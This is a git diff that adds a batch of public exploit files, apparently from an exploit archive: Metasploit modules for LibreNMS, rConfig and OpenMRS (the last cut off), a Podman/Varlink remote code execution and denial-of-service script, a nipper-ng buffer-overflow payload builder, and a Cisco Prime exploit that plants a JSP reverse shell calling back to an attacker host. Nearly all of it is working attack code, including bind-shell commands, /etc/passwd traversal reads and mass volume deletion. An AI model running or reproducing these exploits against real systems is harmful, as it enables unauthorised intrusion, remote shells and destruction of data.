diff --git a/exploits/linux/remote/47375.rb b/exploits/linux/remote/47375.rb
new file mode 100755
index 000000000..a10dbe03a
--- /dev/null
+++ b/exploits/linux/remote/47375.rb
@@ -0,0 +1,231 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'LibreNMS Collectd Command Injection',
+      'Description'    => %q(
+        This module exploits a command injection vulnerability in the
+        Collectd graphing functionality in LibreNMS.
+
+        The `to` and `from` parameters used to define the range for
+        a graph are sanitized using the `mysqli_escape_real_string()`
+        function, which permits backticks. These parameters are used
+        as part of a shell command that gets executed via the `passthru()`
+        function, which can result in code execution.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Eldar Marcussen', # Vulnerability discovery
+        'Shelby Pace'      # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-10669' ],
+          [ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ]
+        ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+      [
+        [ 'Linux',
+          {
+            'Platform'        =>  'unix',
+            'Arch'            =>  ARCH_CMD,
+            'DefaultOptions'  =>  { 'Payload' => 'cmd/unix/reverse' }
+          }
+        ]
+      ],
+      'DisclosureDate' => '2019-07-15',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
+      OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
+      OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
+    ])
+  end
+
+  def check
+    res = send_request_cgi!('method'  =>  'GET', 'uri'  =>  target_uri.path)
+    return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms')
+
+    about_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path, 'pages', 'about.inc.php')
+    )
+
+    return Exploit::CheckCode::Detected unless about_res && about_res.code == 200
+
+    version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/)
+    return Exploit::CheckCode::Detected unless version && version.length > 1
+    vprint_status("LibreNMS version #{version[1]} detected")
+    version = Gem::Version.new(version[1])
+
+    return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50')
+  end
+
+  def login
+    login_uri = normalize_uri(target_uri.path, 'login')
+    res = send_request_cgi('method' =>  'GET',  'uri' =>  login_uri)
+    fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200
+
+    cookies = res.get_cookies
+    login_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  login_uri,
+      'cookie'    =>  cookies,
+      'vars_post' =>
+      {
+        'username'  =>  datastore['USERNAME'],
+        'password'  =>  datastore['PASSWORD']
+      }
+    )
+
+    fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302
+
+    cookies = login_res.get_cookies
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path),
+      'cookie'  =>  cookies
+    )
+    fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')
+
+    print_status('Successfully logged into LibreNMS. Storing credentials...')
+    store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+    login_res.get_cookies
+  end
+
+  def get_version
+    uri = normalize_uri(target_uri.path, 'about')
+
+    res = send_request_cgi( 'method'  =>  'GET', 'uri' => uri, 'cookie' => @cookies )
+    fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200
+
+    html = res.get_html_document
+    version = html.search('tr//td//a')
+    fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty?
+    version.each do |e|
+      return $1 if e.text =~ /(\d+\.\d+\.?\d*)/
+    end
+  end
+
+  def get_device_ids
+    version = get_version
+    print_status("LibreNMS version: #{version}")
+
+    if version && Gem::Version.new(version) < Gem::Version.new('1.50')
+      dev_uri = normalize_uri(target_uri.path, 'ajax_table.php')
+      format = '+list_detail'
+    else
+      dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device')
+      format = 'list_detail'
+    end
+
+    dev_res = send_request_cgi(
+      'method'    =>  'POST',
+      'uri'       =>  dev_uri,
+      'cookie'    =>  @cookies,
+      'vars_post' =>
+      {
+        'id'              =>  'devices',
+        'format'          =>  format,
+        'current'         =>  '1',
+        'sort[hostname]'  =>  'asc',
+        'rowCount'        =>  50
+      }
+    )
+
+    fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200
+
+    json = JSON.parse(dev_res.body)
+    fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty?
+
+    json = json['rows']
+    fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty?
+
+    hosts = []
+    json.each do |row|
+      hostname = row['hostname']
+      next if hostname.nil?
+
+      id = hostname.match('href=\"device\/device=(\d+)\/')
+      next unless id && id.length > 1
+      hosts << id[1]
+    end
+
+    fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty?
+
+    hosts
+  end
+
+  def get_plugin_info(id)
+    uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd")
+
+    res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies )
+    return unless res && res.code == 200
+
+    html = res.get_html_document
+    plugin_link = html.at('div[@class="col-md-3"]//a/@href')
+    return if plugin_link.nil?
+
+    plugin_link = plugin_link.value
+    plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }]
+    c_plugin = plugin_hash['c_plugin']
+    c_type = plugin_hash['c_type']
+    c_type_instance = plugin_hash['c_type_instance'] || ''
+    c_plugin_instance = plugin_hash['c_plugin_instance'] || ''
+
+    return c_plugin, c_type, c_plugin_instance, c_type_instance
+  end
+
+  def exploit
+    req_uri = normalize_uri(target_uri.path, 'graph.php')
+    @cookies = login
+
+    dev_ids = get_device_ids
+
+    collectd_device = -1
+    plugin_name = nil
+    plugin_type = nil
+    plugin_instance = nil
+    plugin_type_inst = nil
+    dev_ids.each do |device|
+     collectd_device = device
+     plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device)
+     break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst)
+     collectd_device = -1
+    end
+
+    fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1
+    print_status("Sending payload via device #{collectd_device}")
+
+    res = send_request_cgi(
+      'method'    =>  'GET',
+      'uri'       =>  req_uri,
+      'cookie'    =>  @cookies,
+      'vars_get'  =>
+      {
+        'device'                =>  collectd_device,
+        'type'                  =>  'device_collectd',
+        'to'                    =>  Rex::Text.rand_text_numeric(10),
+        'from'                  =>  "1`#{payload.encoded}`",
+        'c_plugin'              =>  plugin_name,
+        'c_type'                =>  plugin_type,
+        'c_plugin_instance'     =>  plugin_instance,
+        'c_type_instance'       =>  plugin_type_inst
+      }
+    )
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47500.py b/exploits/linux/remote/47500.py
new file mode 100755
index 000000000..b11dccbc6
--- /dev/null
+++ b/exploits/linux/remote/47500.py
@@ -0,0 +1,302 @@
+# Exploit Title: Podman & Varlink 1.5.1 - Remote Code Execution
+# Exploit Author: Jeremy Brown
+# Date: 2019-10-15
+# Vendor Homepage: https://podman.io/
+# Software Link: dnf install podman or https://github.com/containers/libpod/releases
+# Version: 1.5.1
+# Tested on: Fedora Server 30
+
+#!/usr/bin/python
+# -*- coding: UTF-8 -*-
+#
+# pickletime.py
+#
+# Podman + Varlink Insecure Config Remote Exploit
+#
+# -------
+# Details
+# -------
+#
+# Podman is container engine / platform similar to Docker supported
+# by RedHat and Fedora with Varlink being a protocol to exchange
+# messages, which comes in handy for things like a Remote API.
+#
+# Now depending on how Podman and Varlink are deployed, they can be
+# susceptible to local and remote attacks. There are a few API bugs
+# in Podman itself, as well as a way to execute arbitary commands if
+# one can hit Podman via the Remote API. Running Podman with Varlink
+# over tcp listening either on localhost or the network interface is the
+# most vulnerable setup, but other ways such as access via the local UNIX
+# socket or over SSH (key /w no passphrase is common) aren't likely
+# to be vulnerable unless ACLs or other stuff is broken.
+#
+# ------------------
+# Testing the issues
+# ------------------
+#
+# - check; just connects and issues GetInfo() to see if the host is
+#   running a podman service
+#
+# - exec; arbitrary cmd execution via ContainerRunlabel() specified
+#   by "run" label in the specified hosted image (self-setup)
+#
+# - dos; crash the server via choosing a /random/ selection from
+# 	the available parsing bugs in APIs (we like to have fun here)
+#
+# - blind; dir traversal in SearchImages() API to force server to
+#   read an arbitrary file (no client-side output)
+#
+# - volrm; loops to remove all volumes via VolumeRemove() behavior
+#
+# ---------
+# Exec demo
+# ---------
+#
+# $ ./pickletime.py check podman-host:6000
+# -> Podman service confirmed on host
+#
+# Then create a Dockerfile with an edgy label, build and host it.
+#
+# [Dockerfile]
+# FROM busybox
+# LABEL run=“nc -l -p 10000 -e /bin/bash”
+#
+# $ ./pickletime.py exec podman-host:6000 docker-registry:5000/image run
+# Done!
+#
+# $ nc podman-host 10000
+# ps                             
+#    PID TTY          TIME CMD   
+# 111640 pts/1    00:00:00 bash  
+# 111786 pts/1    00:00:00 podman
+# 111797 pts/1    00:00:00 nc    
+# 111799 pts/1    00:00:00 bash  
+# 111801 pts/1    00:00:00 ps    
+#
+#
+# Tested Podman 1.4.4/1.5.1 and Varlink 18 on Fedora Server 30 x64
+#
+# -----------
+# Other stuff
+# -----------
+#
+# Note: admins can really setup their connection and deployment configuration
+# however they like, so it's hard to say how many folks are 'doing it wrong'
+# or actually are running with proper auth and hardening in place. Shodan
+# folks have been contacted about adding support to discover Varlink services
+# to get more data that way as well.
+#
+# Fixed bugs:
+# - DoS #2 was fixed in 1.5.1
+# - Updated security docs / cli flags TBD
+#
+# > Why pickles? Why not.
+#
+# Dependencies to run this code:
+#
+# sudo dnf install -y python3-podman-api
+#
+#
+#
+
+import os
+import sys
+import socket
+import subprocess
+import random
+import json
+import podman
+import pickle
+import time
+
+serviceName = 'io.podman' # service name
+
+def main():
+	if(len(sys.argv) < 2):
+		print("Usage: %s <action> <host> [action....params]\n" % sys.argv[0])
+		print("Eg:    %s check tcp:podman-host:6000" % sys.argv[0])
+		print("...    %s exec  tcp:podman-host:6000 docker-registry:5000/image run\n" % sys.argv[0])
+		print("Actions: check, exec, dos, blind, volrm\n")
+		return
+
+	action = sys.argv[1]
+	address = sys.argv[2] # eg. unix:/run/podman/io.podman for local testing
+
+	ip = address.split(':')[1]
+	port = int(address.split(':')[2])
+
+	if(action == 'exec'):
+		if(len(sys.argv) < 4):
+			print("Error: need more args for exec")
+			return
+
+		image = sys.argv[3] # 'source' for pull
+		label = sys.argv[4]
+
+	isItTime()
+
+	try:
+		pman = podman.Client(uri=address)
+	except Exception:
+		print("Error: can't connect to host")
+		return
+
+	if(action == 'check'):
+		result = json.dumps(pman.system.info())
+
+		if('podman_version' in result):
+			print("-> Podman service confirmed on host")
+			return
+		
+		print("-!- Podman service was not found on host")
+
+	
+	elif(action == 'exec'):
+		#
+		# First pull the image from the repo, then run the label
+		#
+		try:
+			result = pman.images.pull(image) # PullImage()
+		except Exception as error:
+			pass # call fails sometimes if image already exists which is *ok*
+
+		#
+		# ContainerRunlabel() ... but, no library imp. we'll do it live!
+		#
+		method = serviceName + '.' + 'ContainerRunlabel'
+
+		message = '{\"method\":\"'
+		message += method
+		message += '\",\"parameters\":'
+		message += '{\"Runlabel\":{\"image\":\"'
+		message += image
+		message += '\",\"label\":\"'
+		message += label
+		message += '\"}}}'
+		message += '\0' # end each msg with a NULL byte
+
+		doSocketSend(ip, port, message)
+
+
+	elif(action == 'dos'):
+		#bug = 1 # !fun
+		bug = random.randint(1,2) # fun
+		
+		if(bug == 1):
+			print("one")
+			source = 'test'
+
+			method = serviceName + '.' + 'LoadImage'
+
+			message = '{\"method\":\"'
+			message += method
+			message += '\",\"parameters\":'
+			message += '{\"source":\"'
+			message += source
+			message += '\"}}'
+			message += '\0'
+
+			doSocketSend(ip, port, message)
+
+
+		# works on 1.4.4, fixed in 1.5.1
+		if(bug == 2):
+			print("two")
+
+			reference = 'b' * 238
+			source = '/dev/null' # this file must exist locally
+
+			method = serviceName + '.' + 'ImportImage'
+
+			message = '{\"method\":\"'
+			message += method
+			message += '\",\"parameters\":'
+			message += '{\"reference\":\"'
+			message += reference
+			message += '\",\"source\":\"'
+			message += source
+			message += '\"}}'
+			message += '\0'
+			
+			doSocketSend(ip, port, message)
+
+
+	#
+	# blind read of arbitrary files server-side
+	# ...interesting but not particularly useful by itself
+	#
+	# openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 7
+	# lseek(7, 0, SEEK_CUR)             = 0
+	# fstat(7, {st_mode=S_IFREG|0644, st_size=1672, ...}) = 0
+	# read(7, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 1672
+	# close(7)
+	#
+	elif(action == 'blind'):
+		method = serviceName + '.' + 'SearchImages'
+		query = '../../../etc/passwd/' # magic '/' at the end
+
+		message = '{\"method\":\"'
+		message += method
+		message += '\",\"parameters\":'
+		message += '{\"query\":\"'
+		message += query
+		message += '\"}}'
+		message += '\0'
+
+		#pman.images.search(query) # unclear why this doesn't work
+		doSocketSend(ip, port, message)
+	
+	#
+	# Not really a bug, but an interesting feature to demo without auth
+	# note: call CreateVolume() a few times beforehand to test the removal
+	#
+	elif(action == 'volrm'):
+		method = serviceName + '.' + 'VolumeRemove'
+		n = 10 # this is probably enough to test, but change as necessary
+		
+		message = '{\"method\":\"'
+		message += method
+		message += '\",\"parameters\":'
+		message += '{\"options\":{\"volumes\":[\"\"]}}}' # empty = alphabetical removal
+		message += '\0'
+
+		for _ in range(n):
+			doSocketSend(ip, port, message)
+			time.sleep(0.5) # server processing time
+
+	print("Done!")
+
+
+#
+# podman/varlink libaries don't support calling these API calls, so native we must
+#
+def doSocketSend(ip, port, message):
+	try:
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.connect((ip, port))
+		sock.send(message.encode())
+		
+	except Exception as error:
+		print(str(error))
+		return
+		
+	finally:
+		sock.close()
+
+
+#
+# obligatory routine
+#
+def isItTime():
+	tm = time.localtime()
+
+	p = pickle.dumps('it\'s pickle time!')
+
+	if((str(tm.tm_hour) == '11') and (str(tm.tm_min) == '11')):
+		print(pickle.loads(p))
+	else:
+		pass # no dill
+
+
+if(__name__ == '__main__'):
+	main()
\ No newline at end of file
diff --git a/exploits/linux/remote/47602.rb b/exploits/linux/remote/47602.rb
new file mode 100755
index 000000000..b2bc9aba4
--- /dev/null
+++ b/exploits/linux/remote/47602.rb
@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'rConfig install Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated command injection vulnerability
+        in rConfig versions 3.9.2 and prior. The `install` directory is not
+        automatically removed after installation, allowing unauthenticated users
+        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
+        as the web server user.
+
+        This module has been tested successfully on rConfig version 3.9.2 on
+        CentOS 7.7.1908 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mhaskar', # Discovery and exploit
+          'bcoles'   # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-16662'],
+          ['EDB', '47555'],
+          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
+          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
+        ],
+      'Platform'       => %w[unix linux],
+      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
+      'Targets'        =>
+        [
+          ['Automatic (Unix In-Memory)',
+            'Platform'       => 'unix',
+            'Arch'           => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            'Type'           => :unix_memory
+          ],
+          ['Automatic (Linux Dropper)',
+            'Platform'       => 'linux',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
+            'Type'           => :linux_dropper
+          ]
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
+      'DisclosureDate' => '2019-10-28',
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
+      ])
+  end
+
+  def check
+    res = execute_command('id')
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 404
+      vprint_error 'Could not find install directory'
+      return CheckCode::Safe
+    end
+
+    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first
+
+    unless cmd_res
+      return CheckCode::Safe
+    end
+
+    vprint_status "Response: #{cmd_res}"
+
+    unless cmd_res.include?('uid=')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status "Executing command: #{cmd}"
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
+      'vars_get' => {'rootUname' => ";#{cmd} #"}
+    }, 5)
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(:linemax => 1_500)
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47673.py b/exploits/linux/remote/47673.py
new file mode 100755
index 000000000..ba279f3ea
--- /dev/null
+++ b/exploits/linux/remote/47673.py
@@ -0,0 +1,100 @@
+# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
+# Date: 2019-10-20
+# Exploit Author: Guy Levin
+# https://blog.vastart.dev
+# Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng
+# Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source
+# Version:  0.11.10
+# Tested on: Debian
+# CVE : CVE-2019-17424
+
+"""
+    Exploit generator created by Guy Levin (@va_start - twitter.com/va_start)
+    Vulnerability found by Guy Levin (@va_start - twitter.com/va_start)
+
+    For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post
+    https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html
+
+    may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems
+"""
+
+import sys
+import struct
+
+def pack_dword(i):
+    return struct.pack("<I", i)
+
+def prepare_shell_command(shell_command):
+    return shell_command.replace(" ", "${IFS}")
+
+def build_exploit(shell_command):
+    EXPLOIT_SKELETON = r"privilage exec level 1 " \
+                        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \
+                        "aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \
+                        "kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \
+                        "acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \
+                        "uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \
+                        "adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \
+                        "faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \
+                        "aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \
+                        "paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \
+                        "agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \
+                        "zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \
+                        "ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \
+                        "kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \
+                        "ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj"
+
+    WRITEABLE_BUFFER = 0x080FA001
+    CALL_TO_SYSTEM = 0x0804E870
+    COMMAND_BUFFER = 0x080FA015 
+
+    OFFSET_FOR_WRITEABLE_BUFFER = 0x326
+    OFFSET_FOR_RETURN = 0x33a
+    OFFSET_FOR_COMMAND_BUFFER = 0x33e
+    
+    OFFSET_FOR_SHELL_COMMAND = 0x2a
+    MAX_SHELL_COMMAND_CHARS = 48
+
+    target_values_at_offsets = {
+        WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER, 
+        CALL_TO_SYSTEM : OFFSET_FOR_RETURN, 
+        COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER
+        }
+
+    exploit = bytearray(EXPLOIT_SKELETON, "ascii")
+    
+    # copy pointers
+    for target_value, target_offset in target_values_at_offsets.items():
+        target_value = pack_dword(target_value)
+        exploit[target_offset:target_offset+len(target_value)] = target_value
+
+    # copy payload
+    if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
+        raise ValueError("shell command is too big")
+    shell_command = prepare_shell_command(shell_command)
+    if len(shell_command) > MAX_SHELL_COMMAND_CHARS:
+        raise ValueError("shell command is too big after replacing spaces")
+
+    # adding padding to end of shell command
+    for i, letter in enumerate(shell_command + "&&"):
+        exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter)
+
+    return exploit
+
+def main():
+    if len(sys.argv) != 3:
+        print(f"usage: {sys.argv[0]} <shell command to execute> <output file>")
+        return 1
+
+    try:
+        payload = build_exploit(sys.argv[1])
+    except Exception as e:
+        print(f"error building exploit: {e}")
+        return 1
+
+    open(sys.argv[2], "wb").write(payload)
+
+    return 0 # success
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/linux/remote/47686.py b/exploits/linux/remote/47686.py
new file mode 100755
index 000000000..ee085c28f
--- /dev/null
+++ b/exploits/linux/remote/47686.py
@@ -0,0 +1,172 @@
+#!/usr/bin/python
+
+"""
+Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability
+Steven Seeley (mr_me) of Source Incite - 2019
+SRC: SRC-2019-0034
+CVE: CVE-2019-1821
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback:port>
+(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
+
+saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
+(+) planted backdoor!
+(+) starting handler on port 4444
+(+) connection from 192.168.100.123
+(+) pop thy shell!
+python -c 'import pty; pty.spawn("/bin/bash")'
+[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
+/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
+sh-4.1# /usr/bin/id
+/usr/bin/id
+uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0
+sh-4.1# exit
+exit
+exit
+[prime@piconsole CSCOlumos]$ exit
+exit
+exit
+"""
+
+import sys
+import socket
+import requests
+import tarfile
+import telnetlib
+from threading import Thread
+from cStringIO import StringIO
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def _build_tar(ls, lp):
+    """
+    build the tar archive without touching disk
+    """
+    f = StringIO()
+    b = _get_jsp(ls, lp)
+    t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")
+    t.size = len(b)
+    with tarfile.open(fileobj=f, mode="w") as tar:
+        tar.addfile(t, StringIO(b))
+    return f.getvalue()
+
+def _get_jsp(ls, lp):
+    jsp = """<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+<%
+  class StreamConnector extends Thread
+  {
+    InputStream sv;
+    OutputStream tp;
+    StreamConnector( InputStream sv, OutputStream tp )
+    {
+      this.sv = sv;
+      this.tp = tp;
+    }
+    public void run()
+    {
+      BufferedReader za  = null;
+      BufferedWriter hjr = null;
+      try
+      {
+        za  = new BufferedReader( new InputStreamReader( this.sv ) );
+        hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );
+        char buffer[] = new char[8192];
+        int length;
+        while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )
+        {
+          hjr.write( buffer, 0, length );
+          hjr.flush();
+        }
+      } catch( Exception e ){}
+      try
+      {
+        if( za != null )
+          za.close();
+        if( hjr != null )
+          hjr.close();
+      } catch( Exception e ){}
+    }
+  }
+  try
+  {
+    String ShellPath = new String("/bin/sh");
+    Socket socket = new Socket("__IP__", __PORT__);
+    Process process = Runtime.getRuntime().exec( ShellPath );
+    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+  } catch( Exception e ) {}
+%>"""
+    return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))
+
+def handler(lp):
+    """
+    This is the client handler, to catch the connectback
+    """
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, lp):
+    """
+    This function threads the client handler and sends off the attacking payload
+    """
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    r = requests.get("https://%s/si.jsp" % t, verify=False)
+
+def we_can_upload(t, ls, lp):
+    """
+    This is where we take advantage of the vulnerability
+    """
+    td = _build_tar(ls, lp)
+    bd = {'files': ('si.tar', td)}
+    h = {
+      'Destination-Dir': 'tftpRoot',
+      'Compressed-Archive': "false",
+      'Primary-IP' : '127.0.0.1',
+      'Filecount' : "1",
+      'Filename': "si.tar",
+      'Filesize' : str(len(td)),
+    }
+    r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def main():
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]
+        sys.exit(-1)
+    t  = sys.argv[1]
+    cb = sys.argv[2]
+    if not ":" in cb:
+        print "(+) using default connectback port 4444"
+        ls = cb
+        lp = 4444
+    else:
+        if not cb.split(":")[1].isdigit():
+            print "(-) %s is not a port number!" % cb.split(":")[1]
+            sys.exit(-1)
+        ls = cb.split(":")[0]
+        lp = int(cb.split(":")[1])
+    if we_can_upload(t, ls, lp):
+        print "(+) planted backdoor!"
+        exec_code(t, lp)
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/linux/remote/47792.rb b/exploits/linux/remote/47792.rb
new file mode 100755
index 000000000..7ba10d652
--- /dev/null
+++ b/exploits/linux/remote/47792.rb
@@ -0,0 +1,133 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenMRS Java Deserialization RCE',
+      'Description'    => %q(
+        OpenMRS is an open-source platform that supplies
+        users with a customizable medical record system.
+
+        There exists an object deserialization vulnerability
+        in the `webservices.rest` module used in OpenMRS Platform.
+        Unauthenticated remote code execution can be achieved
+        by sending a malicious XML payload to a Rest API endpoint
+        such as `/ws/rest/v1/concept`.
+
+        This module uses an XML payload generated with Marshalsec
+        that targets the ImageIO component of the XStream library.
+
+        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+        8 and Java 9.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nicolas Serra', # Vuln Discovery and PoC
+        'mpgn',          # PoC
+        'Shelby Pace'    # Metasploit Module
+      ],
+      'References'     =>
+       [
+         [ 'CVE', '2018-19276' ],
+         [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
+         [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
+       ],
+      'Platform'       => [ 'unix', 'linux' ],
